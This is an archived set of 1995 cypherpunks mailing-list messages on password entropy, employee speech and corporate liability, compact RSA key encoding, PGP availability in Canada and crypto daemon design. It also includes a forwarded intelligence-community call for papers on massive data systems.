>longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
>much superior to "%foo%foo".

I don't buy this argument. The only reason "foofoo" could have less entropy than "foobar" is if the attacker had some reason to know that the user tends to choose doubled passwords, or something like that. If the user has historically chosen passwords with roughly six bits of entropy per character, then "foofoo" is exactly as likely as "foobar", and is no "weaker" from an information-theoretic perspective. In fact, information theory would generally note that discarding the "foofoo" choice slightly reduces the entropy in the password.

It is also worth noting that any good password algorithm doesn't permit one to determine if the password is _partly_ right, so entropy measurements can't really meaningfully be made on a per-character basis, only on the password as a whole.

It is because the attacker knows that many (if not most) users tend to prefer passwords that are "easier to remember" that leads him to try the more memorable combinations *first*.
The information-theoretic interpretation of this is that such memorable passwords have less entropy than the others, because the probability that the next account an attacker tries to guess uses a memorable password is higher than the probability that it doesn't. "foobar" occurs as a password less frequently than "foofoo", so it has more entropy. The extra entropy didn't come from the use of more characters, it came from all the more lazy users who like "foofoo" better.

To use a variant of Tim's example, "7f#qp)djQ10hB%3t+1?U4SVp5" is not measurably better than "7f#q#)d#Q10h#%#t+1#U4S#p5", even though the latter uses the "#" character much more frequently than the first. Both passwords are so far down the list that they probably have never occurred as passwords. Both contain effectively the same entropy.

To address the original question:

>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?

Probably not. It may even increase security, as "the quick brown fox" is more frequently used than "the quick quick brown fox" as someone's password, and should, therefore, be tried first.

>>And on the same note, do repeated
>>letters in a UNIX password make that password easier to break?

Again, probably not. If the letters are generally chosen at random, then "abafraa" is just as likely to occur as "abifryu". If the letters are chosen less randomly, like from a name, then "anna" is more likely than "xavier", but less likely than "john".

From sjb at universe.digex.net Wed Nov 22 13:53:42 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Thu, 23 Nov 1995 05:53:42 +0800
Subject: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511222108.QAA10547@universe.digex.net>

"Thomas M. Swiss" writes:
> A (possibly stupid) thought: could commercial key escrow help here?
>
> I very much want hospitals to have fast access to my medical data if
>my broken and bleeding body should come through their door, even if I am
>unconscious and my personal physician cannot be reached. On the other hand,
>I don't want anyone to be snooping through them right now.

Actually, Bell Labs outlines a system which can preserve anonymity under these circumstances in "The Use of Communications Networks to Increase Personal Privacy In a Health Insurance Architecture" at . It's based on their anonymous credit card protocol, which is really a sort of identity escrow service managed by a remailer. You might find it interesting.

From fc at all.net Thu Nov 23 06:00:43 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 23 Nov 95 06:00:43 PST
Subject: Java & Netscape security [NOISE]
In-Reply-To: <30B3CE64.6BF2@netscape.com>
Message-ID: <9511231357.AA10766@all.net>

> Alice (or someone representing themselves as Alice) said:
>
> > What I'm trying to say is that if someone posts from watson.ibm.com,
> > and IF they are talking about OS/2, we will not accept that they are
> > not speaking independently of the knowledge they have garnered from
> > watson.
>
> And that is understandable.
>
> > In the same way, someone who writes from Netscape.com or AT&T, or Sun
> > and tries to disclaim that they are speaking for the company, when
> > they step out as an employee of a company is deluding themselves.
>
> This is a complete non sequitur. See if you can follow this: only those
> authorized by the company to speak for the company are authorized to speak
> for the company.

This is not correct, at least according to legal precedent. If someone who is from Sun represents themselves as being from Sun (i.e., a Sun.Com email address in their signature line), then when they speak (or email) about Sun, its products, its policies, etc., they represent Sun.
> There is a genuine difference between a corporate officer saying
>
> The Amalgamated Widget corporate policy on strong crypto is ...
>
> and some engineer from Amalgamated Widget saying
>
> My private opinion on strong crypto is ...

There is indeed a difference, but it's not as big as you might seem to think. Even more importantly, there is a difference between the person from Amalgamated Widget speaking on strong crypto and the person from Sun speaking on Java.

> The consequence of every statement by every employee being taken as
> company policy is that every employee (except for public relations) will
> be prohibited from contributing to any public forum or even answering
> apparently innocuous questions on the net. This would not be a desirable
> outcome.

In fact, employees represent the company any time they use company names, symbols, stationery, return addresses, etc. If the Netscape legal staff and corporate security board haven't made this clear to management and employees, that's pretty bad. If the officers of Netscape haven't taken appropriate policy measures to notify employees of this potential liability (it appears that at least they haven't notified Phillip), then negative consequences could result in personal liability to the officers (a shareholder lawsuit would be the most common cause of such liability).

As a Netscape employee, you should immediately point this out to the corporate person you report to, and do so in writing. This sort of lapse is a strong indicator that inadequate IT audit has been done in Netscape. In a comprehensive IT audit, such policy lapses should be identified quickly and changes in corporate policies should follow very closely.

> Still speaking for myself,

You are still speaking for Netscape, but hopefully after reading this message, you and your company will realize it.

> PK
> --
> Philip L.
Karlton karlton at netscape.com
> Principal Curmudgeon http://www.netscape.com/people/karlton
> Netscape Communications

--
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From ylo at cs.hut.fi Thu Nov 23 06:32:25 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Thu, 23 Nov 95 06:32:25 PST
Subject: Design proposal: crypto-capable generic interface
In-Reply-To:
Message-ID: <199511231334.OAA00460@trance.olari.clinet.fi>

> Ok. But public keys have one serious disadvantage: their size. I can't
> put a public key on my business card or read it over the phone. I want an
> unforgeable key name. I want this to be the standard key name in the
> interface between the application and the crypto engine. I want users to
> be able to specify them directly, at the very least to bootstrap the
> public key infrastructure.

There is a patent by someone (I think it was IBM) on how to pack RSA keys in small space. I think they were putting them on the magnetic strips that you have behind every card. I'm afraid I don't have the patent number saved, but I have seen the patent document myself at the patent office. No, I'm afraid I don't remember how they encoded it.

Using that method (or something similar), you could probably encode the keys into acceptably short strings with S/KEY-style encoding.

Tatu

From ylo at cs.hut.fi Thu Nov 23 06:44:09 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Thu, 23 Nov 95 06:44:09 PST
Subject: Intelligence Community Massive Digital Data Systems Initiative
Message-ID: <199511231246.NAA00407@trance.olari.clinet.fi>

Below is some information about the Intelligence Community Massive Digital Data Systems Initiative.
Summary:
- new data 2 - 5 terabytes (10^12 bytes) per day
- total size about 20 petabytes (20 * 10^15 bytes)
- 300 terabytes on-line, the rest accessible in a few minutes
- funding (for the research initiative, not for the final system): 3-5 million USD per year estimated for investments

Now, how much is 2 - 5 terabytes per day?
- 20 - 50.000.000 jpeg images (100kB/image, relatively high-quality) per day
- 20 - 50.000.000 minutes of GSM-quality phone intercepts per day
- 1.000.000 - 2.500.000 minutes of compressed (256kbit/sec) video per day
- 1.000.000.000 - 3.000.000.000 e-mail messages per day
- you can continue the list; most available data sets turn out to be much smaller

How much is 20 petabytes? Assuming you want to collect information about 100.000.000 people worldwide, this makes 200 megabytes per person (on the average for each of those 100 million people). 200 megabytes per person on the average is quite a lot, since for many of those people you probably don't have all that much data. Maybe 90% of the data for 10% of the people?

(Of course, in a database like this you might also have a lot of data like aerial imagery, satellite imagery, economical information, etc., so it is a little exaggerated to talk about all of it being on individual people.)

The full text is below.

Crypto relevance? Makes you think whether you should protect your data.
Tatu

From: dbowner at cs.wisc.edu ( Dbowner)
To: bal at mitre.org, mike at nobozo.CS.Berkeley.EDU, shosani at csr.lbl.gov, gray at sfbay.enet.dec.com, livny at cs.wisc.edu, ragrawal at almaden.ibm.com, manola at gte.com, heiler at gte.com, dayal at hplabs.hpl.hp.com, shan at hplabs.hpl.hp.com, toby at almaden.ibm.com, reiner at ksr.com, jag at allegra.att.com, randy at allspice.berkeley.edu, mcleod at vaxa.isi.edu, nick at MIMSY.CS.UMD.EDU, ake at purdue.edu, laney at ccr-p.ida.org, darema at watson.ibm.com, grossman at math.uic.edu, dbusa at cs.wisc.edu, metadata at llnl.gov, jmaitan at mosaic.uncc.edu, whm at thumper.bellcore.com
Cc: susan at mitre.org, connie at mitre.org
Subject: Call For Papers MDDS
Date: Thu, 18 Nov 93 11:08:03 EST
Resent-To: dbworld-people at cs.wisc.edu
Comments: IF YOU REPLY TO THIS MESSAGE, BE SURE TO EDIT THE to: AND cc: LISTS. The dbworld alias reaches many people, and should only be used for messages of general interest to the database community. Mail sent to dbedu goes to the subset of addresses with a .edu suffix; mail sent to dbusa goes to the subset of US addresses. Please use the smaller lists when appropriate. Requests to get on or off dbworld should go to dbworld-request at cs.wisc.edu.
Reply-To: (Susan L. Hanlon)
Resent-Reply-To: (Susan L. Hanlon)

3 November 1993

Dear Colleague:

Subject: Call for Abstracts for Massive Digital Data Systems

Future intelligence systems must effectively manage massive amounts of digital data (i.e., multi-terabytes or greater). Issues such as scalability, design, and integration need to be addressed to realize a wide spectrum of intelligence systems ranging from centralized terabyte and petabyte systems comprised of many large objects (e.g., images) to distributed heterogeneous databases that contain many small and large objects (e.g., text).
The Community Management Staff's Massive Digital Data Systems (MDDS) Working Group on behalf of the intelligence community, is sponsoring a two day invitation-only unclassified workshop on the data management of massive digital data systems with government, industry, and academia. The workshop will be held on the 1st and 2nd of February 1994 in Reston, Virginia. The objective of the workshop is to make industry and academia aware of intelligence community needs, stimulate discussion of the technical issues and possible solutions, and identify potential research efforts that warrant further investigation for possible government funding. The amount of funding estimated for investments is three to five million dollars per year over the next 2-3 years. Last July, a one-day, classified, government-only workshop was held to characterize the magnitude of the problem and identify the major challenges. The needs, issues, and in some cases, lessons learned, were presented for different data types including Imagery, Text, Voice, Video, and Multi-media. Enclosure 1, "Massive Digital Data System Issues", is an unclassified description of the consolidated challenges. The Massive Digital Data Systems Working Group is soliciting one-page abstracts related to the issues of the data management of massive digital systems including (but not limited to) scalability, architecture and data models, and database management functions. The focus of the abstract should be on potential solutions for the longer term research challenges (i.e., 5-10 years out) that must be addressed today in order to effectively manage data of massive proportions in the future. The solutions need not be limited to proven approaches today but can foster new approaches and paradigms. Issues relating to the storage media and analysis tools, while important to the intelligence community, are not within the scope of the workshop. 
Selection for attendance will be based upon technical relevance, clarity, and quality of the proposed solution.

Each one-page abstract should follow the abstract format enclosed (Enclosure 2). All submissions must be UNCLASSIFIED. To allow enough time for proper evaluation of each abstract, the deadline for submission is 01 December 1993. You will be notified of acceptance to attend by 17 December 1993.

Abstracts should be forwarded to one of the following:

Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA 22219
Jackie Booth, ORD/SETA, fax number (703) 351-2629
boothj at mcl.saic.com (Internet)

Please pass this call for abstracts on to other colleagues that are working on solutions in this area.

Sincerely,

Dr. David Charvonia
Director, Advanced Technology Office
Community Management Staff

Enclosures:
1. Massive Digital Data Systems Issues
2. Abstract Format

Enclosure 2

ABSTRACT FORMAT

Title:
Author(s):
Organization/Affiliation:
Address:
Phone:
FAX:
Description:
Status: (Research, Prototype, Operational)
Scope: (Size of effort in terms of dollars and/or staff months; Size of system in terms of amount of data, number of databases, nodes, users, etc.)
Customer: (if applicable)
Operational Use: (if applicable)

********************************************************************

Forward to one of the following:

Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA 22219
Jackie Booth, ORD/SETA, fax number (703) 351-2629
boothj at mcl.saic.com (Internet)

-------------------------------------------------------------------

MASSIVE DIGITAL DATA SYSTEMS ISSUES

EXECUTIVE SUMMARY

Future intelligence systems must effectively manage massive amounts of digital data (i.e., multi-terabytes or greater). Issues such as scalability, design, and integration need to be addressed to realize a wide spectrum of intelligence systems ranging from centralized terabyte and petabyte systems comprising many large objects (e.g.
images) to distributed heterogeneous databases that contain many small and large objects (e.g. text). Consequently, Massive Digital Data Systems (MDDS) are needed to store, retrieve, and manage this data for the intelligence community (IC). While several advances have been made in database management technology, the complexity and the size of the database as well as the unique needs of the IC require the development of novel approaches.

This paper identifies a set of data management issues for MDDS. In particular, discussions of the scalability issues, architectural and data modeling issues, and functional issues are given. The architectures for MDDS could be centralized, distributed, parallel, or federated. The functions of MDDS include query processing, browsing, transaction management, metadata management, multimedia data processing, integrity maintenance, and realtime data processing. Representing complex data structures, developing appropriate architectures, indexing multimedia data, optimizing queries, maintaining caches, minimizing secondary storage access and communications costs, enforcing integrity constraints, meeting realtime constraints, enforcing concurrency control, recovery, and backup mechanisms, and integrating heterogeneous schemas, are some of the complex tasks for massive database management. The issues identified in this paper will provide the basis for stimulating efforts in massive database management for the IC.

1.0 INTRODUCTION

1.1 The Challenge

The IC is challenged to store, retrieve, and manage massive amounts of digital information. Massive Digital Data Systems (MDDS), which range from centralized terabyte and petabyte systems containing many large objects (e.g., images) to distributed heterogeneous databases that contain many small and large objects (e.g., open source), are needed to manage this information.
Although technologies for storage, processing, and transmission are rapidly advancing to support centralized and distributed database applications, more research is still needed to handle massive databases efficiently. This paper describes issues on data management for MDDS including scalability, architecture, data models, and database management functions. Issues related to storage media, analysis tools, and security while important to the IC are not within the scope of this paper.

The key set of data management issues for MDDS include:
- Developing architectures for managing massive databases
- Utilizing data models for representing the complex data structures
- Formulating and optimizing queries
- Developing techniques for concurrency control and recovery
- Integrating heterogeneous schemas
- Meeting timing constraints for queries and transactions
- Indexing multimedia data
- Maintaining caches and minimizing secondary storage access and communications costs
- Enforcing integrity constraints.

1.2 Background

The IC provides analysis on current intelligence priorities for policy makers based upon new and historical data collected from intelligence sources and open sources (e.g., news wire services, magazines). Not only are activities becoming more complex, but changing demands require that the IC process different types as well as larger volumes of data. Factors contributing to the increase in volume include continuing improvements in collection capabilities, more worldwide information, and open sources. At the same time, the IC is faced with decreasing resources, less time to respond, shifting priorities, and wider variety of interests. Consequently, the IC is taking a proactive role in stimulating research in the efficient management of massive databases and ensuring that IC requirements can be incorporated or adapted into commercial products.
Because the challenges are not unique to any one agency, the Community Management Staff (CMS) has commissioned a Massive Digital Data Systems Working Group to address the needs and to identify and evaluate possible solutions.

1.3 Assumptions and Project Requirements

Future intelligence systems must provide a full suite of services for gathering, storing, processing, integrating, retrieving, distributing, manipulating, sharing and presenting intelligence data. The information to be shared is massive including multimedia data such as documents, graphics, video, and audio. It is desired that the systems be adapted to handle new data types.

The goal is to be able to retain the data for potential future analysis in a cost effective manner. The more relevant data would remain on-line, say for 5 years, organized with the most relevant data accessible in the least amount of time. It is expected that 2 to 5 terabytes of new data has to be processed each day. Thus, the total size of the database (both on-line and off-line) could be as large as 20 petabytes with about 300 terabytes of data stored on-line. It is assumed that storage devices (primary, secondary, and even tertiary) for the large multimedia databases as well as data pathways with the required capacity will exist. The access times are about 5 seconds for the data less than a week old, about 30 seconds for data under two months old, and on the order of minutes for data up to 10 years old.

2.0 SCALABILITY ISSUES

A particular data management approach can be scaled to manage larger and larger databases. That is, a database can often sustain a certain amount of growth before it becomes too large for a particular approach. For example, more memory, storage, and processors could be added, a new hardware platform or an operating system could be adopted, or a different microprocessor could be used (e.g. using a 32 bit microprocessor instead of a 16 bit microprocessor).
Once the size of the database has achieved its limit with a particular approach, then a new approach is required. This new approach could be a new architecture, a new data model, or new algorithms to implement one or more of the functions of the database management system (DBMS), or a combination of these features. Discussions of these three features are given below.

Architectures: The type of architecture impacts the size and response time of the DBMS. Centralized approaches are being migrated to distributed and parallel approaches to handle large databases. Some architectures such as the shared nothing parallel architectures are scalable to thousands of processors, but will have multiprocessor communication issues. Current approaches need to be assessed to determine their scalability limits. New approaches may be required for handling massive databases.

Data Models: Data models which support a rich set of constructs are desired for next generation database applications. However, the search and access time of the DBMS would depend on the data model used. For example DBMSs which support complex data structures use large caches, access data through pointers, and work well with large main memory in general, while DBMSs based on simpler data models maintain index files and provide associative access to the secondary storage. The limits of these models within the context of massive databases need to be understood. New or modified approaches may be required.

DBMS Functions: The techniques to implement the DBMS functions have to be modified to handle massive databases. For example, as the size of the database increases, new approaches for query optimization, concurrency control, recovery, and backup, access methods and indexing, and metadata management will be required.

The architectural, data modeling, and functional issues that need to be addressed for MDDS will be elaborated in sections 3 and 4.
3.0 ARCHITECTURAL AND DATA MODELING ISSUES

3.1 Architectural Issues

This section describes some of the architectural issues that need to be addressed for an MDDS.

In the case of the centralized approach, a major issue is managing the data transfer between the main memory and secondary storage. One could expect the data that is a week old to be cached in main memory, the data that is less than two months old to be in secondary memory, and data that is a few years old to be in tertiary storage. In designing the data management techniques (such as those for querying, updating, and transaction processing), data transfer between the main and secondary memories needs to be minimized. There is also a need to reflect patterns of use (e.g., in migrating items to lower/higher levels of storage hierarchy). Another issue is the relationship between the size of the cache and the size of the database.

When one migrates to distributed and parallel architectures, a goal is to maintain a larger number of smaller databases. It is assumed that processors and storage devices are available. A major issue is the communication between the processors. In designing the data management mechanisms, an objective would be to minimize the communication between the different processors. For example, in the case of a join operation between several relations in a relational DBMS, each fragmented across multiple sites, an issue is whether to merge all of the fragments of a relation and then perform the join operation or whether to do several join operations between the fragments and then merge the results to form the final result. Different configurations of the distributed and parallel architectures also need to be examined. For example, there could be point-to-point communication between every processor, or the processors could be arranged in clusters and communication between clusters is carried out by designated processors.
Another issue in migrating to a distributed architecture is handling data distribution. For example, if the data model is relational, then how could one fragment the various relations across the different sites? If the relations are to be replicated for availability, then how could consistency of the replicated copies be maintained? Another issue is what data could be cached within the distributed system, how could data be cached, and for how long could the cache be maintained. While distributed and parallel architectures are being investigated for managing massive databases, federated architectures are needed to integrate the existing different and disparate databases. The existing databases could be massive centralized databases or they could be distributed databases. Furthermore, they could be relational, object-oriented and even legacy systems. An issue in heterogeneous database integration is developing standard uniform interfaces which can be accessed via an integration backplane. If the environment is a federated one, where the nodes have some autonomy, then a major issue is the ability to share each other's data while maintaining the autonomy of the individual DBMSs. This is hard because cooperation and autonomy are conflicting goals. The techniques to implement the DBMS functions for data retrieval, updates, and maintaining integrity have to be adapted or new approaches have to be developed for federated architectures. Extensible architectures are also being investigated for massive databases. With such architectures, DBMSs are extended with inferencing modules which make deductions from data already in the database. This way, one need not store all of the data in the database explicitly. Instead, appropriate inference rules are used to make deductions and derive new data. This way the size of the database is reduced. 
The issues include determining what data is to be stored in the database and what data is to be stored in the knowledge base manipulated by the inferencing module, effective management of the knowledge base, and adapting the functions of the DBMS to handle extensible architectures.

3.2 Data Modeling Issues

In selecting an appropriate data model for massive databases, several issues must be considered. Providing a data model powerful enough to support the representation of complex data must be addressed. For example, with a multimedia document, one may need to devise a scheme to represent the entire document in such a way to facilitate browsing and updating. Since the age of a document could be used to move it between different storage media, it is desirable for the data model to support the representation of temporal constructs. The representation of different types of multimedia devices and grouping of documents are also important considerations in selecting a data model. The data model chosen has an impact on the techniques to implement the functions of a DBMS. For example, DBMSs based on some models use associative access while those based on some other models use pointer traversal.

In migrating to a distributed/parallel architecture, if it is assumed that the data model is the same for all databases, then a major issue is whether it is feasible to provide a conceptual view of the entire massive database to the user. However, in the case of a federated architecture, since it is generally assumed that the individual data models are different, several additional issues need to be considered. For example, could the users have a global view of the massive database or could they have their own individual views? In either case, it would be desirable for the users to access the distributed databases in a transparent manner. If a global view is enforced, the query processor could transform the queries on the global view to the views of the individual databases.
If each user has his own view, then the query processor could transform the user's view into the views of the individual databases. Other issues for a federated architecture include the representation of the individual schemas (which describe the data in the databases), determining which schemas are to be exported to the federation, filtering appropriate information from the schemas at different echelons, integrating the schemas to provide a global view, and generating the external schemas for the users. In integrating the different schemas, the semantic and syntactic inconsistencies between the different representations need to be resolved. For example, the address in database A could include the house number and the street name while in database B it could just be the city and the state. 4.0 FUNCTIONAL ISSUES The techniques to implement the functions of MDDS will be impacted by the architectures and data models as well as requirements such as integrity and multimedia data processing. Therefore some of the functional issues have already been addressed in section 3. This section provides a more detailed overview of the functional issues. First the basic functional issues for MDDS (such as issues on query processing and transaction management) will be discussed and then the impact of maintaining integrity, realtime processing, and multimedia data processing will be given. 4.1 Querying, Browsing, and Filtering The query operation is a means by which users can retrieve data from the database. Closely related is the browsing operation where users traverse various links and subsequently scan multiple documents either sequentially or concurrently. To determine if the new information warrants viewing by the analyst and/or to enforce access control, automatic filtering of the data is needed. 
Some issues in query management for massive databases are using an appropriate language for specifying queries and developing optimization techniques for the various operations involved in a query. The goals are to make it easier for users to formulate queries and also to minimize data transfer between primary and secondary storage. Query management in a federated environment must provide the means for formulating and processing queries seamlessly and efficiently. This involves designing an interface for formulating queries over multiple sources. There is a need for query optimization, in order to prevent degradation in performance in the distributed system. In addition to determining the execution strategy for a query, query optimization techniques could also determine which portion of the query processing is to remain under direct and unshared control at the analyst's workstation. Methods need to be developed for browsing the integrated information space and for displaying results obtained from multiple sources. Finally, data from local databases have to be filtered according to the various constraints (such as security constraints) and enforced before sending it to the remote sites. Query processing algorithms in an extensible architecture need to incorporate inferencing techniques. The usefulness of inferencing techniques for intelligence applications can best be illustrated with a simple example. Suppose parts A, B, C and D are needed to build a nuclear weapon, and also suppose that the following constraint is enforced: " if three of the four parts are shipped to country X, then the fourth part should not be shipped to X." Therefore, if parts A, B, and C are already shipped to X and there is a request from X for part D, then the inferencing module will determine that this part cannot be shipped. An issue in developing an inference module is determining the deduction strategies to be implemented. 
These strategies could be just logical deduction or could include more sophisticated techniques such as reasoning under uncertainty and inductive inference. With most inference strategies one runs into the problem of an infinite loop; therefore appropriate time limits must be enforced to control the computation. In general, the issues to be addressed in query management will include: query optimization; handling data distribution; making intelligent deductions; uniform vs. user-tailored query language. 4.2 Update Transaction Processing Multi-user updates are supported in general to improve performance. The goal is for multiple users to be able to update the database concurrently. A major issue here is ensuring that the consistency of the database is maintained. The techniques that ensure consistency are concurrency control techniques. Often update requests are issued as part of transactions. A transaction is a program unit that must be executed in its entirety or not executed at all. Therefore, if the transaction aborts due to some error, such as system failure, then the database is recovered to a consistent state. Several concurrency control algorithms have been designed and developed for different environments. Some algorithms are suitable for short transactions in business processing applications and some others are suitable for long transactions which often involve multimedia data. To handle long transactions efficiently, weaker forms of consistency conditions have been formulated. Several recovery techniques have also been developed to maintain the consistency of the database. If the transaction is long, then the log files that record the actions of the transaction may be quite large. Efficient management of log files becomes an issue. As the size of the database increases, a transaction would take a longer time for execution. Adapting the concurrency control and recovery algorithms or developing new algorithms to work with the massive databases becomes an issue. 
Update transaction processing gets more complicated in distributed and federated environments. For example, if replicated copies are to be maintained, then making them consistent will have an impact on the performance. Therefore, an issue here is whether to maintain strict consistency or select a subset of the copies and make them consistent immediately so that the remaining copies could be updated at a later time. One of the problems with a federated environment is the different concurrency control and recovery algorithms used by the individual DBMSs. In such a situation synchronizing the different techniques becomes a major issue. 4.3 Access Methods and Index Strategies To enhance the performance of query and update algorithms, efficient access methods and index strategies have to be enforced. That is, in generating strategies for executing query and update requests, the access methods and index strategies that are used need to be taken into consideration. The access methods used to access the database would depend on the indexing methods. Therefore creating and maintaining appropriate index files is a major issue in a DBMS. Usually, the size of the index file grows with the size of the database. In some cases, the index file could be larger than the database itself. Some of the issues include determining what type of indexes are to be maintained for massive databases. Is it feasible to have dense indexing where there is an entry in the index file for every entry in the database? If so, the index file could have as many entries as there are in the database. Is it better to have sparse indexing so that the size of the index file could be reduced? If so, is there a strategy to determine which entries in the database are to be indexed? For multimedia data, indexing could be done not only by content but by type, language, context (i.e., where, how, when it was collected), author (i.e., for documents), and speaker (i.e., for voice). 
The challenge is how to index and to provide improved mechanisms for extraction of the information used for indexing. For example, the ability to automatically index voice is desired. Additionally, the ability to index voice and video (with associated voice) with their transcriptions (i.e., time alignment) is necessary. Various storage structures have been proposed. These include B-Trees and Parent-Child links. The question is, are these methods suitable for massive databases? Voice and video data require segmentation into logical units for storage and access. Additionally, the ability for automatic segmentation within documents of embedded drawings and figures and their interpretation (via seamless integration with image handling tools) is needed. Other challenges include providing user transparent hierarchical storage management (i.e., store the most relevant or most recent information on the fastest media) and the ability to reposition data in the storage hierarchy based upon changing importance, migration mechanisms for transferring information to newer storage media or a new architecture (failure to do so can lead to exorbitant costs to maintain discontinued storage media drives or inaccessible data), archival technology/policies for older/less important information, and synchronization of information distributed across multiple repositories. Compression can decrease the costs of storage and transmission especially for the larger objects such as vector and raster spatial data types, voice, imagery, and video. Real-time conversion of heterogeneous voice and video compression and file formats in network broadcasts/multicasts is an issue. For imagery, a capability such as pyramidal decomposition for providing reduced resolution images is needed for browsing purposes. 
4.4 Managing the Metadata The metadata includes a description of the data in the database (also referred to as the schemas), the index strategies and access methods used, the integrity mechanisms enforced, and other information for administrative purposes. Metadata management functions include representing, querying, and updating the metadata. In massive databases, if the metadatabase is much smaller than the database, then the traditional techniques could be applied to manage the metadata. If the metadatabase becomes massive, then new techniques need to be developed. An issue here is whether the techniques for massive databases could be applied for massive metadatabases also. Support for schema evolution is desired in many new generation applications. For example, the structures of the entities in the database could change with time. An entity could acquire new attributes or existing attributes could be deleted. The metadata needs to be represented in a manner that would facilitate schema evolution. That is, appropriate models to represent the metadata are desired. Since the metadata has to be accessed for all of the functions of a DBMS, the module that is responsible for accessing the metadata needs to communicate with all the other modules. Efficient implementation of this module is necessary to avoid performance bottlenecks. Certain types of metadata, such as the schemas, are usually accessible to the external users. An issue here is whether to provide a view to the users that is different from the system's view of the metadata. For example, a different representation of the metadata could be used for the users. Also, if the metadatabase is massive, then subsets of it could be presented to the users. 4.5 Integrity Concurrency control and recovery issues discussed in section 4.3 are some of the issues that need to be dealt with in order to maintain the integrity (i.e. consistency) of the database. 
Other types of integrity include maintaining the referential integrity of entities and enforcing application dependent integrity constraints. Referential integrity mechanisms must ensure that the entities referenced exist. The question is, how could the references to an entity be deleted when an entity itself is deleted? If the databases are massive, then there will probably be more references to the deleted entity. Deleting all these references in a timely manner is an issue. In the case of application specific integrity constraints, they could trigger a series of updates when one or more items in the database gets updated. Again, as the size of the database increases, the number of updates that are triggered could also increase. The issue here is ensuring that the updates are carried out in a timely manner. 4.6 Realtime / Near Realtime Processing Within a massive digital data system, the challenges of realtime or near realtime processing will be compounded. For realtime or near realtime applications, timing constraints may be enforced on the transactions and/or the queries. In the case of a hard realtime environment, meeting the timing constraints may cause the integrity of the data to suffer. In the case of soft realtime constraints (also referred to as near real-time), there is greater flexibility in meeting the deadlines. The issues for real-time processing include: If a transaction misses its deadline, then what are the actions that could be taken? Could a value function be associated with a transaction which can be used to determine whether the transaction should continue after it misses its deadline? Could the transaction be aborted if the value of the data approaches zero? What is the impact on the scheduling algorithms when timing constraints are present? How can the techniques be extended for a distributed/federated architecture? 
In the case of realtime updates in a distributed replicated environment, is it possible to maintain the consistency of the replicated copies and still meet the timing constraints? What is the impact on the techniques for multimedia data processing? 4.7 Multimedia Data Processing By nature, multimedia data management has to deal with many of the requirements for indexing, browsing, retrieving, and updating of the individual media types. Implementing multimedia data types will require new paradigms for representing, storing, processing, accessing, manipulating, visualizing, and displaying data from various sources in different media. One of the major issues here is synchronizing the display of different media types such as voice and video. Other issues include selecting/developing appropriate data models for representing the multimedia data and developing appropriate indexing techniques such as maintaining indexes on textual, voice, and video patterns. For example, the ability to index voice and video simultaneously may be desired. In addition to the manipulation of multimedia data, frameworks for the integration of multimedia objects as well as handling different granularity of multimedia objects (i.e., 1 hour video clip versus a spreadsheet cell) need to be considered. A flexible environment has to be provided so that the linked and embedded distributed multimedia objects can accommodate geographic/network changes. Finally, the data manipulation techniques as well as the frameworks need to be extensible to support new and diverse data types. 4.8 Backup and Recovery On-line backup procedures are being used for massive databases. This is because off-line procedures will consume too much time for massive databases. Even if the backup procedures are carried out on-line, the system could be slowed down and therefore the performance of other data management functions would suffer. 
The issue here is to develop improved techniques for backup so that it will not impact functions such as querying, browsing, and updating. Recovery issues for transaction management were discussed in section 4.3. Other recovery issues include whether to maintain multiple copies of the database, and if so, the number of copies to be maintained, and whether the checkpointing, roll-back and recovery procedures proposed for traditional databases could be used for massive databases or is there a need to develop special mechanisms? 5.0 SUMMARY Massive digital data systems will require effective management, retrieval, and integration of databases which are possibly heterogeneous in nature. Achieving this concept of massive intelligence information systems will require new technologies and novel approaches for data management. While hardware is rapidly advancing to provide massive data storage, processing, and transmission, the software necessary for the retrieval, integration, and management of data remains an enormous challenge. This paper has identified a set of issues for managing the data in massive digital data systems with a focus on intelligence applications. First, an overview of the current approaches to data management and the scalability of the current approaches were discussed. Then some architectural and data modeling issues were given. Finally, a discussion of the issues for the various functions of MDDS was given. The set of issues identified is by no means considered a complete list. As the progression of research, prototyping, and deployments continue, new or hidden challenges will arise. From x93ojg at juliet.stfx.ca Thu Nov 23 07:01:49 1995 From: x93ojg at juliet.stfx.ca (Still) Date: Thu, 23 Nov 95 07:01:49 PST Subject: PGP in Canada In-Reply-To: Message-ID: On Thu, 23 Nov 1995, Tim Philp wrote: > You can try to get PGP from the MIT site but it may not allow you to do > so if it does not recognize your address as being Canadian. 
I tried to > get PGP-Phone and it told me that it did not think that I was a Canadian. > I wrote to the administrator but have never received a reply. I checked > about a week ago and I still could not get the file. > Tim Philp > I already downloaded a copy last week but I deleted it because I didn't know if it was legal to use it and my Sys admin would probably revoke my account if it was illegal. I was talking to him and he told me that if I can prove that it is legal he will let me use it. -- T H E M A N , T H E M Y T H , T H E L E G E N D . ****************************************************************************** * Dylan "Still" Boudreau * Knowledge is proud that she knows so much; * * Internet: x93ojg at stfx.ca * Wisdom is humble that she knows no more. * ****************************************************************************** * Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html * ****************************************************************************** When someone says, "That's a good question." You can be sure it's a lot better than the answer you're going to get. From attila at primenet.com Wed Nov 22 15:44:08 1995 From: attila at primenet.com (attila) Date: Thu, 23 Nov 1995 07:44:08 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: Message-ID: On Wed, 22 Nov 1995, Raph Levien wrote: > On Wed, 22 Nov 1995, Carl Ellison wrote: > > > >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST) > > >From: Raph Levien > > > > > I propose that the new interface lives as a sort of daemon, rather > > >than a static collection of command line script pieces. > > > > Danger, Will Robinson! (see below) > attila-> the daemon, in and of itself, is not dangerous -it becomes critical if it is accessible via the port number tables. 
